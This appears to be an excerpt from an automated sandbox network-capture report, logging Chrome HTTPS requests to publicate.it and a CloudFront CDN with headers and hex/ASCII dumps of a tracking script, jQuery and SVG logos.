                                                                                                                                                                                                        x-amz-version-id: GKyXS2_k_frklts_CJntA9JOOTdXp6OV
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:21 GMT
                                                                                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                                                                                        ETag: "c9861c1ac17232aeca7ab6802d7a8e19"
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                        Via: 1.1 416dae0837568c2bb7cea7ae5c6bba22.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: EJlGVUP6lWVZNe4il8sgOPd_jjE7ZS74pG7VQNTJEFgGWzZ1uZNpHA==
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 63 28 6e 29 7b 76 61 72 20 65 3d 55 28 29 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 3d 65 5b 6e 5d 7c 7c 7b 69 64 3a 6e 2c 70 6c 75 67 69 6e 73 3a 7b 7d 2c 67 65 74 50 6c 75 67 69 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 65 3d 5b 5d 3b 66 6f 72 28 6e 20 69 6e 20 74 68 69 73 2e 70 6c 75 67 69 6e 73 29 65 2e 70 75 73 68 28 74 68 69 73 2e 70 6c 75 67 69 6e 73 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 61 75 74 6f 54 72 61 63 6b 69 6e 67 49 6e 69 74 69 61 6c 69 7a 65 64 3a 21 31 7d 2c 65 5b 6e 5d 7d 66 75 6e 63 74 69 6f 6e 20 50 28 6e 2c 65 29 7b 6e 3d 63 28 6e 29 3b 72 65 74 75 72 6e 20 6e 2e 70 6c 75 67 69 6e 73 5b 65 5d 3d 6e 2e 70 6c 75 67
                                                                                                                                                                                                        Data Ascii: !function(){"use strict";function c(n){var e=U();return e[n]=e[n]||{id:n,plugins:{},getPlugins:function(){var n,e=[];for(n in this.plugins)e.push(this.plugins[n]);return e},autoTrackingInitialized:!1},e[n]}function P(n,e){n=c(n);return n.plugins[e]=n.plug
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC15001INData Raw: 5c 64 7b 31 30 7d 24 2f 2e 74 65 73 74 28 6e 29 29 7b 76 61 72 20 6e 3d 6e 2e 73 70 6c 69 74 28 22 2d 22 29 2c 65 3d 6e 5b 30 5d 2c 6e 3d 70 61 72 73 65 49 6e 74 28 6e 5b 31 5d 29 2c 74 3d 54 6e 28 29 3b 69 66 28 21 28 4d 61 74 68 2e 61 62 73 28 74 2d 6e 29 3e 68 6e 29 29 72 65 74 75 72 6e 20 65 7d 7d 28 6e 3d 53 74 72 69 6e 67 28 6e 29 29 3b 69 66 28 6e 29 72 65 74 75 72 6e 20 6e 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 6e 28 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2f 31 65 33 29 7d 66 75 6e 63 74 69 6f 6e 20 62 6e 28 6e 2c 65 29 7b 6e 3d 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 65 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 6f 72 28 76 61 72 20 74 3d 6e 2e 73
                                                                                                                                                                                                        Data Ascii: \d{10}$/.test(n)){var n=n.split("-"),e=n[0],n=parseInt(n[1]),t=Tn();if(!(Math.abs(t-n)>hn))return e}}(n=String(n));if(n)return n}}}function Tn(){return Math.floor((new Date).getTime()/1e3)}function bn(n,e){n=n.toLowerCase(),e=e.toLowerCase();for(var t=n.s


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        51192.168.2.549807104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC777OUTGET /images/microsoft.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 6391
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "18f7-620aa1d0f2f7a"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FKbqgnL7xHgF1OeJb44kcp%2BaH5uvyY2AnF06Be9dKrQvUeK0dz%2BrHITeCPQh345lvOCk7KTuhL%2FXzXSqB0PkvmJpwzH7KkHraCwq2k3VbnaiVWkiJIWd378ws5APjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615ad9bcd4299-EWR
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC619INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 32 2e 31 2e 30 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22 20 79 3d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 22.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 64 3d 22 4d 31 36 36 2e 35 2c 30 68 31 37 63 30 2c 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 63 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 2c 30 63 30 2d 35 35 2e 35 2c 30 2d 31 31 31 2c 30 2d 31 36 36 2e 35 68 31 32 38 39 76 31 32 39 2e 35 0a 09 09 63 2d 31 31 2e 39 2c 30 2d 32 33 2e 38 2d 30 2e 31 2d 33 35 2e 36 2c 30 2e 31 63 2d 30 2e 33 2d 31 35 2c 30 2d 33 30 2e 31 2d 30 2e 31 2d 34 35 2e 31 63 2d 31 31 2e 39 2c 33 2e 36 2d 32 33 2e 37 2c 37 2e 34 2d 33 35 2e 36 2c 31 30 2e 38 63 2d 30 2e 33 2c 31 31 2e 34 2c 30 2c 32 32 2e 38 2d 30 2e 32 2c 33 34 2e 32 0a 09 09 63 2d 31 37 2e 36 2c 30 2d 33 35 2e 31 2c 30 2d 35 32 2e 37 2c 30 63 30 2e 32 2d 39 2d 30 2e 36 2d 31 38 2c 30 2e 37 2d 32 37 63 31 2e 31 2d 37 2c 35 2e 32 2d 31 34 2e
                                                                                                                                                                                                        Data Ascii: d="M166.5,0h17c0,55.5,0,111,0,166.5c55.5,0,111,0,166.5,0c0-55.5,0-111,0-166.5h1289v129.5c-11.9,0-23.8-0.1-35.6,0.1c-0.3-15,0-30.1-0.1-45.1c-11.9,3.6-23.7,7.4-35.6,10.8c-0.3,11.4,0,22.8-0.2,34.2c-17.6,0-35.1,0-52.7,0c0.2-9-0.6-18,0.7-27c1.1-7,5.2-14.
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 2c 37 2e 38 2c 31 34 2e 34 63 38 2e 36 2c 34 2e 38 2c 31 39 2e 35 2c 32 2e 37 2c 32 37 2e 34 2d 32 2e 36 76 32 39 2e 35 63 2d 31 30 2e 33 2c 34 2e 35 2d 32 31 2e 38 2c 35 2e 38 2d 33 32 2e 39 2c 35 0a 09 09 63 2d 31 30 2e 36 2d 30 2e 38 2d 32 31 2e 35 2d 34 2e 36 2d 32 38 2e 34 2d 31 33 63 2d 38 2d 39 2e 35 2d 31 30 2d 32 32 2e 33 2d 31 30 2e 32 2d 33 34 2e 34 63 2d 30 2e 31 2d 32 35 2e 38 2c 30 2d 35 31 2e 36 2c 30 2d 37 37 2e 34 63 2d 31 37 2e 36 2c 30 2d 33 35 2e 31 2c 30 2d 35 32 2e 37 2c 30 63 30 2c 34 30 2e 35 2c 30 2c 38 31 2c 30 2c 31 32 31 2e 35 0a 09 09 63 2d 31 32 2c 30 2d 32 34 2c 30 2d 33 36 2c 30 63 30 2d 34 30 2e 35 2d 30 2e 31 2d 38 31 2c 30 2d 31 32 31 2e 34 63 2d 38 2e 33 2d 30 2e 32 2d 31 36 2e 37 2c 30 2d 32 35 2e 31 2d 30 2e 31 63 30
                                                                                                                                                                                                        Data Ascii: ,7.8,14.4c8.6,4.8,19.5,2.7,27.4-2.6v29.5c-10.3,4.5-21.8,5.8-32.9,5c-10.6-0.8-21.5-4.6-28.4-13c-8-9.5-10-22.3-10.2-34.4c-0.1-25.8,0-51.6,0-77.4c-17.6,0-35.1,0-52.7,0c0,40.5,0,81,0,121.5c-12,0-24,0-36,0c0-40.5-0.1-81,0-121.4c-8.3-0.2-16.7,0-25.1-0.1c0
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 2e 39 2c 30 2c 32 31 2e 37 2c 30 2e 31 2c 33 32 2e 36 63 2d 31 34 2e 37 2c 38 2e 38 2d 33 32 2e 34 2c 31 31 2d 34 39 2e 32 2c 31 30 2e 32 0a 09 09 63 2d 31 37 2e 32 2d 30 2e 39 2d 33 34 2e 34 2d 37 2e 34 2d 34 36 2e 39 2d 31 39 2e 36 63 2d 31 33 2e 36 2d 31 33 2e 31 2d 32 30 2e 39 2d 33 31 2e 37 2d 32 31 2e 38 2d 35 30 2e 34 63 2d 30 2e 39 2d 31 39 2e 34 2c 33 2e 31 2d 33 39 2e 37 2c 31 34 2e 32 2d 35 35 2e 39 43 37 39 39 2c 31 34 33 2e 37 2c 38 31 33 2e 36 2c 31 33 33 2e 39 2c 38 32 39 2e 36 2c 31 32 39 2e 33 0a 09 09 4c 38 32 39 2e 36 2c 31 32 39 2e 33 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 33 22 20 64 3d 22 4d 31 30 37 33 2e 35 2c 31 32 36 2e 38 63 31 37 2e 33 2d 32 2e 32 2c 33 35 2e 35 2d 31 2e 32 2c 35 31 2e 35 2c 36 2e 31 63
                                                                                                                                                                                                        Data Ascii: .9,0,21.7,0.1,32.6c-14.7,8.8-32.4,11-49.2,10.2c-17.2-0.9-34.4-7.4-46.9-19.6c-13.6-13.1-20.9-31.7-21.8-50.4c-0.9-19.4,3.1-39.7,14.2-55.9C799,143.7,813.6,133.9,829.6,129.3L829.6,129.3z"/><path class="st3" d="M1073.5,126.8c17.3-2.2,35.5-1.2,51.5,6.1c
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 37 2d 35 32 2e 33 63 32 2e 33 2d 31 37 2e 35 2c 31 30 2e 32 2d 33 34 2e 36 2c 32 33 2e 38 2d 34 36 2e 32 43 31 33 33 31 2e 38 2c 31 33 34 2e 31 2c 31 33 34 36 2e 31 2c 31 32 38 2e 36 2c 31 33 36 30 2e 36 2c 31 32 36 2e 37 4c 31 33 36 30 2e 36 2c 31 32 36 2e 37 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 33 22 20 64 3d 22 4d 39 37 33 2e 38 2c 31 33 31 2e 38 63 39 2e 39 2d 36 2c 32 32 2e 36 2d 36 2e 35 2c 33 33 2e 34 2d 32 2e 38 63 2d 30 2e 31 2c 31 32 2c 30 2c 32 34 2c 30 2c 33 36 63 2d 37 2e 31 2d 34 2e 36 2d 31 36 2d 36 2e 36 2d 32 34 2e 33 2d 35 2e 37 63 2d 31 30 2e 32 2c 31 2e 32 2d 31 38 2e 33 2c 39 2d 32 32 2e 35 2c 31 38 0a 09 09 63 2d 34 2e 36 2c 39 2e 35 2d 35 2e 34 2c 32 30 2e 33 2d 35 2e 31 2c 33 30 2e 37 63 30 2c 32 34 2c 30
                                                                                                                                                                                                        Data Ascii: 7-52.3c2.3-17.5,10.2-34.6,23.8-46.2C1331.8,134.1,1346.1,128.6,1360.6,126.7L1360.6,126.7z"/><path class="st3" d="M973.8,131.8c9.9-6,22.6-6.5,33.4-2.8c-0.1,12,0,24,0,36c-7.1-4.6-16-6.6-24.3-5.7c-10.2,1.2-18.3,9-22.5,18c-4.6,9.5-5.4,20.3-5.1,30.7c0,24,0
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC296INData Raw: 36 30 33 2e 32 2c 31 39 32 2e 32 2c 31 36 30 33 2e 33 2c 31 37 35 2e 34 2c 31 36 30 33 2e 32 2c 31 35 38 2e 36 4c 31 36 30 33 2e 32 2c 31 35 38 2e 36 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 34 22 20 64 3d 22 4d 30 2c 31 38 33 2e 35 63 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 2c 30 63 30 2c 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 48 30 56 31 38 33 2e 35 4c 30 2c 31 38 33 2e 35 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 35 22 20 64 3d 22 4d 31 38 33 2e 35 2c 31 38 33 2e 35 63 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 2c 30 63 30 2c 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 48 31 38 33 2e 35 43 31 38 33 2e 35 2c 32 39 34 2e 35 2c 31 38 33 2e 35 2c 32 33 39 2c 31 38
                                                                                                                                                                                                        Data Ascii: 603.2,192.2,1603.3,175.4,1603.2,158.6L1603.2,158.6z"/><path class="st4" d="M0,183.5c55.5,0,111,0,166.5,0c0,55.5,0,111,0,166.5H0V183.5L0,183.5z"/><path class="st5" d="M183.5,183.5c55.5,0,111,0,166.5,0c0,55.5,0,111,0,166.5H183.5C183.5,294.5,183.5,239,18


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        52192.168.2.5497953.161.127.1674436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC615OUTGET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=5e9170ba37cf8dfae03ae1a4 HTTP/1.1
                                                                                                                                                                                                        Host: d3e54v103j8qbb.cloudfront.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        Origin: https://publicate.it
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC574INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 89476
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 06:28:06 GMT
                                                                                                                                                                                                        Last-Modified: Mon, 20 Jul 2020 17:53:02 GMT
                                                                                                                                                                                                        Etag: "dc5e7f18c8d36ac1d3d4753a87c98d0a"
                                                                                                                                                                                                        Cache-Control: max-age=84600, must-revalidate
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Via: 1.1 76c315f993ceca1d67416a80c715a4ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Age: 35295
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: VIE50-P2
                                                                                                                                                                                                        X-Amz-Cf-Id: McXWTixTRxWyEXctA08mMYUQJBgy8O0Hd4Q0w6o9AMalpiSvai759g==
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC15810INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                                                                                                                                                                        Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 79 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 79 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e
                                                                                                                                                                                                        Data Ascii: ction(e){return!!e.parentNode}:function(e,t,n){var r,i,o,a,s,u,l=y!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(y){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 3f 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 53 2e 72 65 61 64 79 29 3a 28 45 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 42 29 2c 43 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 42 29 29 3b 76 61 72 20 24 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 29 7b 76 61 72 20 73 3d 30 2c 75 3d 65 2e 6c 65 6e 67 74 68 2c 6c 3d 6e 75 6c 6c 3d 3d 6e 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 77 28 6e 29 29 66 6f 72 28 73 20 69 6e 20 69 3d 21 30 2c 6e 29 24 28 65 2c 74 2c 73 2c 6e 5b 73 5d 2c 21 30 2c 6f 2c 61 29 3b 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 26 26 28
                                                                                                                                                                                                        Data Ascii: documentElement.doScroll?C.setTimeout(S.ready):(E.addEventListener("DOMContentLoaded",B),C.addEventListener("load",B));var $=function(e,t,n,r,i,o,a){var s=0,u=e.length,l=null==n;if("object"===w(n))for(s in i=!0,n)$(e,t,s,n[s],!0,o,a);else if(void 0!==r&&(
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 6f 6e 63 65 3a 75 2e 6e 6f 6e 63 65 7c 7c 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 7d 2c 6c 29 3a 62 28 75 2e 74 65 78 74 43 6f 6e 74 65 6e 74 2e 72 65 70 6c 61 63 65 28 6a 65 2c 22 22 29 2c 75 2c 6c 29 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 69 3d 74 3f 53 2e 66 69 6c 74 65 72 28 74 2c 65 29 3a 65 2c 6f 3d 30 3b 6e 75 6c 6c 21 3d 28 72 3d 69 5b 6f 5d 29 3b 6f 2b 2b 29 6e 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 53 2e 63 6c 65 61 6e 44 61 74 61 28 76 65 28 72 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 6e 26 26 69 65 28 72 29 26 26 79 65 28 76 65 28 72 2c 22 73 63 72 69 70 74 22 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e
                                                                                                                                                                                                        Data Ascii: once:u.nonce||u.getAttribute("nonce")},l):b(u.textContent.replace(je,""),u,l))}return n}function Re(e,t,n){for(var r,i=t?S.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||S.cleanData(ve(r)),r.parentNode&&(n&&ie(r)&&ye(ve(r,"script")),r.parentNode.
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 72 3d 53 2e 66 78 26 26 53 2e 66 78 2e 73 70 65 65 64 73 5b 72 5d 7c 7c 72 2c 65 3d 65 7c 7c 22 66 78 22 2c 74 68 69 73 2e 71 75 65 75 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 72 29 3b 74 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 7d 7d 29 7d 2c 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2c 69 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 65 6c 65 63 74 22 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 70 74 69 6f 6e 22 29 29 2c 72 74 2e 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 2c 79 2e 63 68
                                                                                                                                                                                                        Data Ascii: ){return r=S.fx&&S.fx.speeds[r]||r,e=e||"fx",this.queue(e,function(e,t){var n=C.setTimeout(e,r);t.stop=function(){C.clearTimeout(n)}})},rt=E.createElement("input"),it=E.createElement("select").appendChild(E.createElement("option")),rt.type="checkbox",y.ch
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC8130INData Raw: 7b 53 28 74 68 69 73 29 2e 72 65 70 6c 61 63 65 57 69 74 68 28 74 68 69 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7d 29 2c 74 68 69 73 7d 7d 29 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 68 69 64 64 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 28 65 29 7d 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c 7c 65 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65
                                                                                                                                                                                                        Data Ascii: {S(this).replaceWith(this.childNodes)}),this}}),S.expr.pseudos.hidden=function(e){return!S.expr.pseudos.visible(e)},S.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().length)},S.ajaxSettings.xhr=function(){try{re


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        53192.168.2.549808104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC773OUTGET /images/adobe.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
